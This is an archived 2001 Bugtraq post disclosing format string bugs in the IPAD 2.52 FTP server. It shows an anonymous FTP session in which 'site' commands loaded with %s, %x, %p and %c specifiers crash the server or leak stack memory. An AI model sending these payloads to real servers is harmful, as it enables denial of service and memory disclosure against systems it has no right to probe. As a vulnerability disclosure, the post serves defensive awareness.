Bugtraq mailing list archives

Multi format string bugs in IPAD x.x ftp server

From: diab <diab_qaip () HOTMAIL COM>
Date: Sat, 17 Feb 2001 15:03:35 -0000

Hi ppl,
There appears to be multiple format string bug's
in IPAD x.x ftp server. Here are some
examples with the 'site' command:

[diab@epuj diab]$ ftp xxx.xxx.xxx.xxx
Connected to xxx.xxx.xxx.xxx.
220 xxx.xxx.xxx.xxx FTP server (IPAD 2.52) ready
at Wed Feb 14 16:08:08 2001
Name (xxx.xxx.xxx.xxx:diab): anonymous
331 Anonymous logins ok. Please enter your e-mail
address as password.
Password:
230 User anonymous logged in.
Remote system type is MSDOS.
ftp> site %s%s%s%s%s%s%s%s%s%s%s%s%s%s
Segmentation fault
[diab@epuj diab]$

or:
ftp> site %x%x%x%x%x%x%x%x%x%x%x
500 Unknown command 'site
8057478806014080635400bfffcc78455449532578252025782578257825782578257825782578'

or:
ftp> site %p%p
500 Unknown command
'8067efc680000184013dab8684013db98'

or:
ftp> site %c%c%c%c
500 Unknown command
'2570(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)0x4
etc 
ftp> quit
500 Unknown command 'site
0.0000000.00000098099176241206326244409344.000000'
[diab@epuj diab]$
   
Anyway I thought I might bring this issue to some
people's attention.
bye,
- diab

Current thread:

Multi format string bugs in IPAD x.x ftp server diab (Feb 19)
- Re: Multi format string bugs in IPAD x.x ftp server Jose Nazario (Feb 20)
- Re: Multi format string bugs in IPAD x.x ftp server Eric Fitzgerald (Feb 20)
  - Re: Multi format string bugs in IPAD x.x ftp server John Edwards (Feb 20)